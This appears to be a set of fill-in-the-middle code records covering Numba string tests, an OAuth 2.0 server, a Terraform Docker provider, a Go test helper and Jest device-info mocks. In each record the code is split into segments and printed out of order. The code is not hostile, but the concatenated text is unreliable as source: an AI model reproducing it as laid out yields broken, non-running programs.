def pyfunc(x):
abc = 'abc'
if len(x):
return abc + 'b123' + x + 'IO'
else:
return x + abc + '123' + x
cfunc = njit(pyfunc)
args = ['x']
self.assertEqual(pyfunc(*args), cfunc(*args))
args = ['']
self.assertEqual(pyfunc(*args), cfunc(*args))
def test_literal_comparison(self):
def pyfunc(option):
x = 'a123'
y = 'aa12'
if option == '==':
return x == y
elif option == '!=':
return x != y
elif option == '<':
return x < y
elif option == '>':
return x > y
elif option == '<=':
return x <= y
elif option == '>=':
return x >= y
else:
return None
cfunc = njit(pyfunc)
for cmpop in ['==', '!=', '<', '>', '<=', '>=', '']:
args = [cmpop]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_len(self):
def pyfunc():
return len('abc')
cfunc = njit(pyfunc)
self.assertEqual(pyfunc(), cfunc())
def test_literal_getitem(self):
def pyfunc(which):
return 'abc'[which]
cfunc = njit(pyfunc)
for a in [-1, 0, 1, slice(1, None), slice(None, -1)]:
args = [a]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_in(self):
def pyfunc(x):
return x in '9876zabiuh'
cfunc = njit(pyfunc)
for a in ['a', '9', '1', '', '8uha', '987']:
args = [a]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_xyzwith(self):
def pyfunc(x, y):
return 'abc'.startswith(x), 'cde'.endswith(y)
cfunc = njit(pyfunc)
for args in permutations('abcdefg', r=2):
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
def test_literal_find(self):
def pyfunc(x):
return 'abc'.find(x), x.find('a')
cfunc = njit(pyfunc)
for a in ['ab']:
args = [a]
self.assertEqual(pyfunc(*args), cfunc(*args),
msg='failed on {}'.format(args))
@unittest.skipUnless(_py34_or_later,
'unicode support requires Python 3.4 or later')
class TestUnicodeInTuple(BaseTest):
def test_const_unicode_in_tuple(self):
# Issue 3673
@njit
def f():
return ('aa',) < ('bb',)
self.assertEqual(f.py_func(), f())
@njit
def f():
return ('cc',) < ('bb',)
self.assertEqual(f.py_func(), f())
def test_const_unicode_in_hetero_tuple(self):
@njit
def f():
return ('aa', 1) < ('bb', 1)
self.assertEqual(f.py_func(), f())
@njit
def f():
return ('aa', 1) < ('aa', 2)
self.assertEqual(f.py_func(), f())
if __name__ == '__main__':
unittest.main() | # Handle non-integer maxsplit exception
for sep in [' ', None]: |
lib.rs | pub mod agent; |
pub fn test() {
println!("Hello from lib!");
} | pub mod log;
#[cfg(test)]
mod test_util;
|
hijack_unix.go | //go:build !windows
// +build !windows
package testhelper
func | (fd uintptr) int {
return int(fd)
}
| getSyscallFD |
authorization_server.py | """OAuth 2.0 WSGI server middleware implements support for basic bearer
tokens and also X.509 certificates as access tokens
OAuth 2.0 Authorisation Server
"""
__author__ = "R B Wilkinson"
__date__ = "12/12/11"
__copyright__ = "(C) 2011 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "[email protected]"
__revision__ = "$Id$"
import json
import logging
import httplib
import urllib
from ndg.oauth.server.lib.access_token.make_access_token import \
make_access_token
from ndg.oauth.server.lib.oauth.access_token import (AccessTokenRequest,
ImplicitGrantAccessTokenResponse)
from ndg.oauth.server.lib.oauth.authorize import (AuthorizeRequest,
AuthorizeResponse)
from ndg.oauth.server.lib.oauth.oauth_exception import OauthException
from ndg.oauth.server.lib.register.access_token import AccessTokenRegister
from ndg.oauth.server.lib.register.authorization_grant import \
AuthorizationGrantRegister
log = logging.getLogger(__name__)
class AuthorizationServer(object):
"""
Provides the core OAuth 2.0 authorisation server functions.
"""
AUTHZ_HDR_ENV_KEYNAME = 'HTTP_AUTHORIZATION'
BEARER_TOK_ID = 'Bearer'
MAC_TOK_ID = 'MAC'
TOKEN_TYPES = (BEARER_TOK_ID, MAC_TOK_ID)
AUTHZ_CODE_RESP_TYPE = 'code'
TOK_RESP_TYPE = 'token'
RESP_TYPES = (AUTHZ_CODE_RESP_TYPE, TOK_RESP_TYPE)
def __init__(self, client_register, authorizer, client_authenticator,
resource_register, resource_authenticator,
access_token_generator, config):
"""Initialise the all the settings for an Authorisation server instance
"""
self.client_register = client_register
self.authorizer = authorizer
self.client_authenticator = client_authenticator
self.resource_register = resource_register
self.resource_authenticator = resource_authenticator
self.access_token_generator = access_token_generator
self.access_token_register = AccessTokenRegister(config)
self.authorization_grant_register = AuthorizationGrantRegister(config)
def authorize(self, request, client_authorized):
"""Handle an authorization request.
It is assumed that the caller has checked whether the user is
authenticated and that the user has authorised the client and scope.
Request query parameters (from
http://tools.ietf.org/html/draft-ietf-oauth-v2-22):
response_type
REQUIRED. Value MUST be set to "code" or "token" in the case
of an implicit grant.
client_id
REQUIRED. The client identifier as described in Section 2.2.
redirect_uri
OPTIONAL, as described in Section 3.1.2.
scope
OPTIONAL. The scope of the access request as described by
Section 3.3.
state
RECOMMENDED. An opaque value used by the client to maintain
state between the request and callback. The authorization
server includes this value when redirecting the user-agent back
to the client. The parameter SHOULD be used for preventing
cross-site request forgery as described in Section 10.12.
Response:
application/x-www-form-urlencoded format:
code
REQUIRED. The authorization code generated by the
authorization server. The authorization code MUST expire
shortly after it is issued to mitigate the risk of leaks. A
maximum authorization code lifetime of 10 minutes is
RECOMMENDED. The client MUST NOT use the authorization code
more than once. If an authorization code is used more than
once, the authorization server MUST deny the request and SHOULD
attempt to revoke all tokens previously issued based on that
authorization code. The authorization code is bound to the
client identifier and redirection URI.
state
REQUIRED if the "state" parameter was present in the client
authorization request. The exact value received from the
client.
@type request: webob.Request
@param request: HTTP request object
@type client_authorized: bool
@param client_authorized: True if resource owner has authorized client
@rtype: tuple: (str, int, str)
@return: tuple (
redirect_uri
HTTP status if error
error description
)
"""
log.debug("Starting authorization request")
# Parameters should only be taken from the query string.
params = request.GET
authz_request = AuthorizeRequest(params.get('response_type', None),
params.get('client_id', None),
params.get('redirect_uri', None),
params.get('scope', None),
params.get('state', None))
try:
self.check_request(request, params, post_only=False)
# Check for required parameters.
required_parameters = ['response_type', 'client_id']
for param in required_parameters:
if param not in params:
log.error("Missing request parameter %s from params: %s",
param, params)
raise OauthException('invalid_request',
"Missing request parameter: %s" % param)
if not client_authorized:
raise OauthException('access_denied',
'User has declined authorization')
client_error = self.client_register.is_valid_client(
authz_request.client_id,
authz_request.redirect_uri)
if client_error:
log.error("Invalid client: %s", client_error)
return (None, httplib.BAD_REQUEST, client_error)
# redirect_uri must be included in the request if the client has
# more than one registered.
client = self.client_register.register[authz_request.client_id]
if (len(client.redirect_uris) != 1 and
not authz_request.redirect_uri):
log.error("An authorization request has been made without a "
"return URI")
return (None,
httplib.BAD_REQUEST,
('An authorization request has been made without a '
'return URI.'))
response_type = params.get('response_type', None)
# Response may be an authorisation code or in the case of an
# Implicit Grant a token
if response_type == self.__class__.AUTHZ_CODE_RESP_TYPE:
log.debug('Client requesting an authorization code')
# Preconditions satisfied - generate grant.
grant, code = self.authorizer.generate_authorization_grant(
authz_request,
request)
authz_response = AuthorizeResponse(code, authz_request.state)
if not self.authorization_grant_register.add_grant(grant):
log.error('Registering grant failed')
raise OauthException('server_error',
'Authorization grant could not be '
'created')
log.debug("Redirecting back after successful authorization.")
return self._redirect_after_authorize(authz_request,
authz_response)
elif response_type == self.__class__.TOK_RESP_TYPE:
log.debug('Implicit Grant - client requesting a token')
impl_grant_response = make_access_token(authz_request,
self.access_token_register,
self.access_token_generator)
log.debug("Redirecting back after successful implicit grant.")
return self._redirect_after_authorize(authz_request,
impl_grant_response)
else:
raise OauthException('unsupported_response_type',
"Response type %s not supported" %
response_type)
except OauthException, exc:
log.error("Redirecting back after error: %s - %s",
exc.error, exc.error_description)
return self._redirect_after_authorize(authz_request, None,
exc.error,
exc.error_description)
def _redirect_after_authorize(self,
authz_request,
authz_response=None,
error=None,
error_description=None):
"""Redirects to the redirect URI after the authorization process as
completed.
@type resp: ndg.oauth.server.lib.oauth.authorize.AuthorizeRequest
@param resp: OAuth authorize request
@type resp: ndg.oauth.server.lib.oauth.authorize.AuthorizeResponse
@param resp: OAuth authorize response
@type error: str
@param error: OAuth error
@type error_description: str
@param error_description: error description
"""
# Check for inconsistencies that should be reported directly to the user.
if not authz_response and not error:
error = 'server_error'
error_description = 'Internal server error'
# Get the redirect URI.
client = self.client_register.register[authz_request.client_id]
redirect_uri = (
authz_request.redirect_uri if authz_request.redirect_uri else \
client.redirect_uris[0]
)
if not redirect_uri:
return (
None,
httplib.BAD_REQUEST,
'An authorization request has been made without a return URI.')
# Redirect back to client with authorization code or error.
if error:
url_parameters = [('error', error),
('error_description', error_description)]
elif isinstance(authz_response, AuthorizeResponse):
url_parameters = [('code', authz_response.code)]
elif isinstance(authz_response, ImplicitGrantAccessTokenResponse):
url_parameters = authz_response.get_as_dict().items()
else:
raise OauthException('Expecting authorisation response or implicit '
'grant response, got %r' % authz_response)
full_redirect_uri = self._make_combined_url(redirect_uri,
url_parameters,
authz_request.state)
log.debug("Redirecting to URI: %s", full_redirect_uri)
return full_redirect_uri, None, None
@staticmethod
def _make_combined_url(base_url, parameters, state):
"""Constructs a URL from a base URL and parameters to be included in a
query string.
@type base_url: str
@param base_url: base URL to which to add query parameters
@type parameters: dict
@param parameters: parameter names and values
@type state: str
@param state: OAuth state parameter value, which should not be URL
encoded
@rtype: str
@return: full URL
"""
url = base_url.rstrip('?')
url_parts = [url]
sep_with_ampersand = ('?' in url)
if parameters:
query_string = urllib.urlencode(parameters)
url_parts.extend([('&' if (sep_with_ampersand) else '?'),
query_string])
sep_with_ampersand = True
if state:
url_parts.extend([('&' if (sep_with_ampersand) else '?'),
'state=',
state])
return ''.join(url_parts)
def | (self, request):
"""
Handles a request for an access token.
Request parameters in post data (from
http://tools.ietf.org/html/draft-ietf-oauth-v2-22):
The client makes a request to the token endpoint by adding the
following parameters using the "application/x-www-form-urlencoded"
format in the HTTP request entity-body:
grant_type
REQUIRED. Value MUST be set to "authorization_code".
code
REQUIRED. The authorization code received from the
authorization server.
redirect_uri
REQUIRED, if the "redirect_uri" parameter was included in the
authorization request as described in Section 4.1.1, and their
values MUST be identical.
Response:
application/json format:
access_token
access token
token_type
token type
expires_in
lifetime of token in seconds
refresh_token
@type request: webob.Request
@param request: HTTP request object
@rtype: tuple: (str, int, str)
@return: tuple (
OAuth JSON response
HTTP status if error
error description
)
"""
log.debug("Starting access token request")
error_status = None
try:
# Parameters should only be taken from the body, not the URL query
# string.
params = request.POST
self.check_request(request, params, post_only=True)
# Check that the client is authenticated as a registered client.
client_id = self.client_authenticator.authenticate(request)
if client_id is None:
log.warn('Client authentication not performed')
error_status = httplib.FORBIDDEN
else:
log.debug("Client id: %s", client_id)
# redirect_uri is only required if it was included in the
# authorization request.
required_parameters = ['grant_type', 'code']
for param in required_parameters:
if param not in params:
log.error("Missing request parameter %s from inputs: %s",
param, params)
raise OauthException(
'invalid_request',
"Missing request parameter: %s" % param)
except OauthException, exc:
# Assume client error
if error_status is None:
error_status = httplib.BAD_REQUEST
return (self._error_access_token_response(exc.error,
exc.error_description),
error_status, exc.error_description)
token_request = AccessTokenRequest(params.get('grant_type', None),
params.get('code', None),
params.get('redirect_uri', None))
try:
response = make_access_token(
token_request, client_id, self.access_token_register,
self.access_token_generator, self.authorization_grant_register)
except OauthException, exc:
return (self._error_access_token_response(exc.error,
exc.error_description),
None, exc.error_description)
if response:
return self._access_token_response(response), None, None
else:
return (None, httplib.INTERNAL_SERVER_ERROR,
'Access token generation failed.')
def _access_token_response(self, resp):
"""Constructs the JSON response to an access token request.
@type resp: ndg.oauth.server.lib.oauth.access_token.AccessTokenResponse
@param resp: OAuth access token response
@rtype: str
@return JSON formatted response
"""
log.debug("Responding successfully with access token.")
content_dict = resp.get_as_dict()
content = json.dumps(content_dict)
return content
def _error_access_token_response(self, error, error_description):
"""Constructs an error JSON response to an access token request.
@type error: str
@param error: OAuth error
@type error_description: str
@param error_description: error description
@rtype: str
@return JSON formatted response
"""
log.error("Responding with error: %s - %s", error, error_description)
error_dict = {'error': error}
if error_description:
error_dict['error_description'] = error_description
error_content = json.dumps(error_dict)
return error_content
def check_request(self, request, params, post_only=False):
"""
Checks that the request is valid in the following respects:
o Must be over HTTPS.
o Optionally, must use the POST method.
o Parameters must not be repeated.
If the request is directly from the client, the user must be
authenticated - it is assumed that the caller has checked this.
Raises OauthException if any check fails.
@type request: webob.Request
@param request: HTTP request object
@type params: dict
@param params: request parameters
@type post_only: bool
@param post_only: True if the HTTP method must be POST, otherwise False
"""
if request.scheme != 'https':
raise OauthException('invalid_request',
'Transport layer security must be used for '
'this request.')
if post_only and request.method != 'POST':
raise OauthException('invalid_request',
'HTTP POST method must be used for this '
'request.')
# Check for duplicate parameters.
param_counts = {}
for key in params.iterkeys():
count = param_counts.get(key, 0)
param_counts[key] = count + 1
for key, count in param_counts.iteritems():
if count > 1:
raise OauthException('invalid_request',
'Parameter "%s" is repeated.' % key)
def check_token(self, request, scope=None):
"""
Simple service that could be used to validate bearer tokens. It would
be called from a resource service that trusts this authorization
service. This is not part of the OAuth specification.
Only POST parameters are accepted in the request, to avoid logging
and caching of access tokens.
Request parameters
access_token
REQUIRED. Bearer token
scope
OPTIONAL. Scope
Response:
application/json format:
status
HTTP status indicating the access control decision
user_name
user identifier corresponding to access token
error
error as described in
http://tools.ietf.org/html/draft-ietf-oauth-v2-22#section-5.2
@type request: webob.Request
@param request: HTTP request object
@type scope: str
@param scope: required scope
@rtype: tuple: (str, int, str)
@return: tuple (
OAuth JSON response
HTTP status
error description
)
"""
# only allow POST params to avoid logging and caching of access tokens
params = request.POST
# Check that the client is authenticated as a registered client.
resource_id = self.resource_authenticator.authenticate(request)
if resource_id is None:
log.warn('Resource authentication not performed')
else:
log.debug("Resource id: %s", resource_id)
# Retrieve access token
if 'access_token' not in params:
error = 'invalid_request'
else:
access_token = params['access_token']
if scope:
required_scope = scope
else:
required_scope = params.get('scope', None)
token, error = self.access_token_register.get_token(access_token,
required_scope)
# Formulate response
status = {'invalid_request': httplib.BAD_REQUEST,
'invalid_token': httplib.FORBIDDEN,
None: httplib.OK}.get(error, httplib.BAD_REQUEST)
content_dict = {'status': status}
if error:
content_dict['error'] = error
else:
# TODO only get additional data when resource is allowed to
content_dict['user_name'] = token.grant.additional_data.get('user_identifier')
content = json.dumps(content_dict)
return (content, status, error)
def get_registered_token(self, request, scope=None):
"""
Checks that a token in the request is valid. It would
be called from a resource service that trusts this authorization
service.
Request parameters:
set in Authorization header (OAuth spec., Section 7.1 Access
Token Types
token type: Bearer or MAC
access token: access token to obtain access
Response:
application/json format:
status
HTTP status indicating the access control decision
error
error as described in
http://tools.ietf.org/html/draft-ietf-oauth-v2-22#section-5.2
@type request: webob.Request
@param request: HTTP request object
@type scope: str
@param scope: required scope
@rtype: tuple: (str, int, str)
@return: tuple (
access token
HTTP status
error description
)
"""
authorization_hdr = request.environ.get(
self.__class__.AUTHZ_HDR_ENV_KEYNAME)
if authorization_hdr is None:
log.error('No Authorization header present for request to %r',
request.path_url)
error = 'invalid_request'
token = None
else:
authorization_hdr_parts = authorization_hdr.split()
            if len(authorization_hdr_parts) < 2:
                log.error('Expecting at least two Authorization header '
                          'elements for request to %r; '
                          'header is: %r', request.path_url, authorization_hdr)
                error = 'invalid_request'
                token = None
            else:
                token_type, access_token = authorization_hdr_parts[:2]
                # Currently only supports bearer type tokens
                if token_type != self.__class__.BEARER_TOK_ID:
                    log.error('Token type retrieved is %r, expecting "Bearer" '
                              'type for request to %r', token_type,
                              request.path_url)
                    error = 'invalid_request'
                    token = None
                else:
                    token, error = self.access_token_register.get_token(
                        access_token,
                        scope)
status = {'invalid_request': httplib.BAD_REQUEST,
'invalid_token': httplib.FORBIDDEN,
'insufficient_scope': httplib.FORBIDDEN,
None: httplib.OK}.get(error, httplib.BAD_REQUEST)
return token, status, error
def is_registered_client(self, request):
"""Determines whether the client ID in the request is registered.
@type request: WebOb.request
@param request: request
@rtype: tuple (basestring, basestring) or (NoneType, NoneType)
@return: (error, error description) or None if client ID is found and
registered
"""
client_id = request.params.get('client_id', None)
if not client_id:
return 'invalid_request', 'Missing request parameter: client_id'
else:
error_description = self.client_register.is_registered_client(
client_id)
if error_description:
return 'unauthorized_client', error_description
return None, None
| access_token |
resource_docker_container_funcs.go | package docker
import (
"archive/tar"
"bytes"
"errors"
"fmt"
"strconv"
"time"
dc "github.com/fsouza/go-dockerclient"
"github.com/hashicorp/terraform/helper/schema"
)
var (
creationTime time.Time
)
func resourceDockerContainerCreate(d *schema.ResourceData, meta interface{}) error {
var err error
client := meta.(*dc.Client)
var data Data
if err := fetchLocalImages(&data, client); err != nil {
return err
}
image := d.Get("image").(string)
if _, ok := data.DockerImages[image]; !ok {
if _, ok := data.DockerImages[image+":latest"]; !ok {
return fmt.Errorf("Unable to find image %s", image)
}
image = image + ":latest"
}
// The awesome, wonderful, splendiferous, sensical
// Docker API now lets you specify a HostConfig in
// CreateContainerOptions, but in my testing it still only
// actually applies HostConfig options set in StartContainer.
// How cool is that?
createOpts := dc.CreateContainerOptions{
Name: d.Get("name").(string),
Config: &dc.Config{
Image: image,
Hostname: d.Get("hostname").(string),
Domainname: d.Get("domainname").(string),
},
}
if v, ok := d.GetOk("env"); ok {
createOpts.Config.Env = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("command"); ok {
createOpts.Config.Cmd = stringListToStringSlice(v.([]interface{}))
for _, v := range createOpts.Config.Cmd {
if v == "" {
return fmt.Errorf("values for command may not be empty")
}
}
}
if v, ok := d.GetOk("entrypoint"); ok {
createOpts.Config.Entrypoint = stringListToStringSlice(v.([]interface{}))
}
if v, ok := d.GetOk("user"); ok {
createOpts.Config.User = v.(string)
}
exposedPorts := map[dc.Port]struct{}{}
portBindings := map[dc.Port][]dc.PortBinding{}
if v, ok := d.GetOk("ports"); ok {
exposedPorts, portBindings = portSetToDockerPorts(v.(*schema.Set))
}
if len(exposedPorts) != 0 {
createOpts.Config.ExposedPorts = exposedPorts
}
extraHosts := []string{}
if v, ok := d.GetOk("host"); ok {
extraHosts = extraHostsSetToDockerExtraHosts(v.(*schema.Set))
}
volumes := map[string]struct{}{}
binds := []string{}
volumesFrom := []string{}
if v, ok := d.GetOk("volumes"); ok {
volumes, binds, volumesFrom, err = volumeSetToDockerVolumes(v.(*schema.Set))
if err != nil {
return fmt.Errorf("Unable to parse volumes: %s", err)
}
}
if len(volumes) != 0 {
createOpts.Config.Volumes = volumes
}
if v, ok := d.GetOk("labels"); ok {
createOpts.Config.Labels = mapTypeMapValsToString(v.(map[string]interface{}))
}
hostConfig := &dc.HostConfig{
Privileged: d.Get("privileged").(bool),
PublishAllPorts: d.Get("publish_all_ports").(bool),
RestartPolicy: dc.RestartPolicy{
Name: d.Get("restart").(string),
MaximumRetryCount: d.Get("max_retry_count").(int),
},
LogConfig: dc.LogConfig{
Type: d.Get("log_driver").(string),
},
}
if len(portBindings) != 0 {
hostConfig.PortBindings = portBindings
}
if len(extraHosts) != 0 {
hostConfig.ExtraHosts = extraHosts
}
if len(binds) != 0 {
hostConfig.Binds = binds
}
if len(volumesFrom) != 0 {
hostConfig.VolumesFrom = volumesFrom
}
if v, ok := d.GetOk("dns"); ok {
hostConfig.DNS = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("dns_opts"); ok {
hostConfig.DNSOptions = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("dns_search"); ok {
hostConfig.DNSSearch = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("links"); ok {
hostConfig.Links = stringSetToStringSlice(v.(*schema.Set))
}
if v, ok := d.GetOk("memory"); ok {
hostConfig.Memory = int64(v.(int)) * 1024 * 1024
}
if v, ok := d.GetOk("memory_swap"); ok {
swap := int64(v.(int))
if swap > 0 {
swap = swap * 1024 * 1024
}
hostConfig.MemorySwap = swap
}
if v, ok := d.GetOk("cpu_shares"); ok {
hostConfig.CPUShares = int64(v.(int))
}
if v, ok := d.GetOk("log_opts"); ok {
hostConfig.LogConfig.Config = mapTypeMapValsToString(v.(map[string]interface{}))
}
if v, ok := d.GetOk("network_mode"); ok {
hostConfig.NetworkMode = v.(string)
}
createOpts.HostConfig = hostConfig
var retContainer *dc.Container
if retContainer, err = client.CreateContainer(createOpts); err != nil {
return fmt.Errorf("Unable to create container: %s", err)
}
if retContainer == nil {
return fmt.Errorf("Returned container is nil")
}
d.SetId(retContainer.ID)
if v, ok := d.GetOk("networks"); ok {
connectionOpts := dc.NetworkConnectionOptions{Container: retContainer.ID}
for _, rawNetwork := range v.(*schema.Set).List() {
network := rawNetwork.(string)
if err := client.ConnectNetwork(network, connectionOpts); err != nil {
return fmt.Errorf("Unable to connect to network '%s': %s", network, err)
}
}
}
if v, ok := d.GetOk("upload"); ok {
for _, upload := range v.(*schema.Set).List() {
content := upload.(map[string]interface{})["content"].(string)
file := upload.(map[string]interface{})["file"].(string)
buf := new(bytes.Buffer)
tw := tar.NewWriter(buf)
hdr := &tar.Header{
Name: file,
Mode: 0644,
Size: int64(len(content)),
}
if err := tw.WriteHeader(hdr); err != nil {
return fmt.Errorf("Error creating tar archive: %s", err)
}
if _, err := tw.Write([]byte(content)); err != nil {
return fmt.Errorf("Error creating tar archive: %s", err)
}
if err := tw.Close(); err != nil {
return fmt.Errorf("Error creating tar archive: %s", err)
}
uploadOpts := dc.UploadToContainerOptions{
InputStream: bytes.NewReader(buf.Bytes()),
Path: "/",
}
if err := client.UploadToContainer(retContainer.ID, uploadOpts); err != nil {
return fmt.Errorf("Unable to upload volume content: %s", err)
}
}
}
creationTime = time.Now()
if err := client.StartContainer(retContainer.ID, nil); err != nil {
return fmt.Errorf("Unable to start container: %s", err)
}
return resourceDockerContainerRead(d, meta)
}
func resourceDockerContainerRead(d *schema.ResourceData, meta interface{}) error {
client := meta.(*dc.Client)
apiContainer, err := fetchDockerContainer(d.Id(), client)
if err != nil {
return err
}
if apiContainer == nil {
// This container doesn't exist anymore
d.SetId("")
return nil
}
var container *dc.Container
loops := 1 // if it hasn't just been created, don't delay
if !creationTime.IsZero() {
loops = 30 // with 500ms spacing, 15 seconds; ought to be plenty
}
sleepTime := 500 * time.Millisecond
for i := loops; i > 0; i-- {
container, err = client.InspectContainer(apiContainer.ID)
if err != nil {
return fmt.Errorf("Error inspecting container %s: %s", apiContainer.ID, err)
}
if container.State.Running ||
!container.State.Running && !d.Get("must_run").(bool) {
break
}
if creationTime.IsZero() { // We didn't just create it, so don't wait around
return resourceDockerContainerDelete(d, meta)
}
if container.State.FinishedAt.After(creationTime) {
// It exited immediately, so error out so dependent containers
// aren't started
resourceDockerContainerDelete(d, meta)
return fmt.Errorf("Container %s exited after creation, error was: %s", apiContainer.ID, container.State.Error)
}
time.Sleep(sleepTime)
}
// Handle the case of the for loop above running its course
if !container.State.Running && d.Get("must_run").(bool) {
resourceDockerContainerDelete(d, meta)
return fmt.Errorf("Container %s failed to be in running state", apiContainer.ID)
}
// Read Network Settings
if container.NetworkSettings != nil {
d.Set("ip_address", container.NetworkSettings.IPAddress)
d.Set("ip_prefix_length", container.NetworkSettings.IPPrefixLen)
d.Set("gateway", container.NetworkSettings.Gateway)
d.Set("bridge", container.NetworkSettings.Bridge)
}
return nil
}
func resourceDockerContainerUpdate(d *schema.ResourceData, meta interface{}) error {
return nil
}
func resourceDockerContainerDelete(d *schema.ResourceData, meta interface{}) error {
client := meta.(*dc.Client)
// Stop the container before removing if destroy_grace_seconds is defined
if d.Get("destroy_grace_seconds").(int) > 0 {
var timeout = uint(d.Get("destroy_grace_seconds").(int))
if err := client.StopContainer(d.Id(), timeout); err != nil {
return fmt.Errorf("Error stopping container %s: %s", d.Id(), err)
}
}
removeOpts := dc.RemoveContainerOptions{
ID: d.Id(),
RemoveVolumes: true,
Force: true,
}
if err := client.RemoveContainer(removeOpts); err != nil {
return fmt.Errorf("Error deleting container %s: %s", d.Id(), err)
}
d.SetId("")
return nil
}
func stringListToStringSlice(stringList []interface{}) []string {
ret := []string{}
for _, v := range stringList {
if v == nil {
ret = append(ret, "")
continue
}
ret = append(ret, v.(string))
}
return ret
}
func stringSetToStringSlice(stringSet *schema.Set) []string {
ret := []string{}
if stringSet == nil {
return ret
}
for _, envVal := range stringSet.List() {
ret = append(ret, envVal.(string))
}
return ret
}
func mapTypeMapValsToString(typeMap map[string]interface{}) map[string]string {
mapped := make(map[string]string, len(typeMap))
for k, v := range typeMap {
mapped[k] = v.(string)
}
return mapped
}
func fetchDockerContainer(ID string, client *dc.Client) (*dc.APIContainers, error) |
func portSetToDockerPorts(ports *schema.Set) (map[dc.Port]struct{}, map[dc.Port][]dc.PortBinding) {
retExposedPorts := map[dc.Port]struct{}{}
retPortBindings := map[dc.Port][]dc.PortBinding{}
for _, portInt := range ports.List() {
port := portInt.(map[string]interface{})
internal := port["internal"].(int)
protocol := port["protocol"].(string)
exposedPort := dc.Port(strconv.Itoa(internal) + "/" + protocol)
retExposedPorts[exposedPort] = struct{}{}
external, extOk := port["external"].(int)
ip, ipOk := port["ip"].(string)
if extOk {
portBinding := dc.PortBinding{
HostPort: strconv.Itoa(external),
}
if ipOk {
portBinding.HostIP = ip
}
retPortBindings[exposedPort] = append(retPortBindings[exposedPort], portBinding)
}
}
return retExposedPorts, retPortBindings
}
func extraHostsSetToDockerExtraHosts(extraHosts *schema.Set) []string {
retExtraHosts := []string{}
for _, hostInt := range extraHosts.List() {
host := hostInt.(map[string]interface{})
ip := host["ip"].(string)
hostname := host["host"].(string)
retExtraHosts = append(retExtraHosts, hostname+":"+ip)
}
return retExtraHosts
}
func volumeSetToDockerVolumes(volumes *schema.Set) (map[string]struct{}, []string, []string, error) {
retVolumeMap := map[string]struct{}{}
retHostConfigBinds := []string{}
retVolumeFromContainers := []string{}
for _, volumeInt := range volumes.List() {
volume := volumeInt.(map[string]interface{})
fromContainer := volume["from_container"].(string)
containerPath := volume["container_path"].(string)
volumeName := volume["volume_name"].(string)
if len(volumeName) == 0 {
volumeName = volume["host_path"].(string)
}
readOnly := volume["read_only"].(bool)
switch {
case len(fromContainer) == 0 && len(containerPath) == 0:
return retVolumeMap, retHostConfigBinds, retVolumeFromContainers, errors.New("Volume entry without container path or source container")
case len(fromContainer) != 0 && len(containerPath) != 0:
return retVolumeMap, retHostConfigBinds, retVolumeFromContainers, errors.New("Both a container and a path specified in a volume entry")
case len(fromContainer) != 0:
retVolumeFromContainers = append(retVolumeFromContainers, fromContainer)
case len(volumeName) != 0:
readWrite := "rw"
if readOnly {
readWrite = "ro"
}
retVolumeMap[containerPath] = struct{}{}
retHostConfigBinds = append(retHostConfigBinds, volumeName+":"+containerPath+":"+readWrite)
default:
retVolumeMap[containerPath] = struct{}{}
}
}
return retVolumeMap, retHostConfigBinds, retVolumeFromContainers, nil
}
| {
apiContainers, err := client.ListContainers(dc.ListContainersOptions{All: true})
if err != nil {
return nil, fmt.Errorf("Error fetching container information from Docker: %s\n", err)
}
for _, apiContainer := range apiContainers {
if apiContainer.ID == ID {
return &apiContainer, nil
}
}
return nil, nil
} |
jest.setup.ts | const asyncFn = <T>(response: T) => () =>
jest.fn(() => {
return Promise.resolve(response);
});
const syncFn = <T>(response: T) => () => jest.fn(() => response);
const makeFns = <T>(response: T) => [asyncFn(response), syncFn(response)];
const [stringFnAsync, stringFnSync] = makeFns('unknown');
const [numberFnAsync, numberFnSync] = makeFns(-1);
const [arrayFnAsync, arrayFnSync] = makeFns([]);
const [booleanFnAsync, booleanFnSync] = makeFns(false);
const [objectFnAsync, objectFnSync] = makeFns({});
const RNDeviceInfo: any = {};
const stringKeys = [
'uniqueId',
'deviceId',
'model',
'brand',
'systemName',
'systemVersion',
'bundleId',
'appName',
'buildNumber',
'appVersion',
];
for (const key of stringKeys) {
RNDeviceInfo[key] = 'unknown';
}
const booleanKeys = ['isTablet'];
for (const key of booleanKeys) {
RNDeviceInfo[key] = false;
}
RNDeviceInfo.syncUniqueId = stringFnAsync();
RNDeviceInfo.getDeviceToken = stringFnSync();
// string getters
const stringFnNames = [
'getInstanceId',
'getSerialNumber',
'getAndroidId',
'getIpAddress',
'getMacAddress',
'getSystemManufacturer',
'getBuildId',
'getApiLevel',
'getInstallerPackageName',
'getDeviceName',
'getUserAgent',
'getBootloader',
'getDevice',
'getDisplay',
'getFingerprint',
'getHardware',
'getHost',
'getProduct',
'getTags',
'getType',
'getBaseOs',
'getSecurityPatch',
'getCodename',
'getIncremental', | 'deviceType',
'getInstallReferrer',
];
for (const name of stringFnNames) {
RNDeviceInfo[name] = stringFnAsync();
RNDeviceInfo[`${name}Sync`] = stringFnSync();
}
// boolean getters
const booleanFnNames = [
'isCameraPresent',
'isEmulator',
'isPinOrFingerprintSet',
'isBatteryCharging',
'isAirplaneMode',
'hasSystemFeature',
'isLocationEnabled',
'isHeadphonesConnected',
];
for (const name of booleanFnNames) {
RNDeviceInfo[name] = booleanFnAsync();
RNDeviceInfo[`${name}Sync`] = booleanFnSync();
}
// number getters
const numberFnNames = [
'getUsedMemory',
'getFontScale',
'getPreviewSdkInt',
'getFirstInstallTime',
'getLastUpdateTime',
'getTotalMemory',
'getMaxMemory',
'getTotalDiskCapacity',
'getTotalDiskCapacityOld',
'getFreeDiskStorage',
'getFreeDiskStorageOld',
'getBatteryLevel',
];
for (const name of numberFnNames) {
RNDeviceInfo[name] = numberFnAsync();
RNDeviceInfo[`${name}Sync`] = numberFnSync();
}
const objectFnNames = ['getPowerState', 'getAvailableLocationProviders'];
for (const name of objectFnNames) {
RNDeviceInfo[name] = objectFnAsync();
RNDeviceInfo[`${name}Sync`] = objectFnSync();
}
const arrayFnNames = [
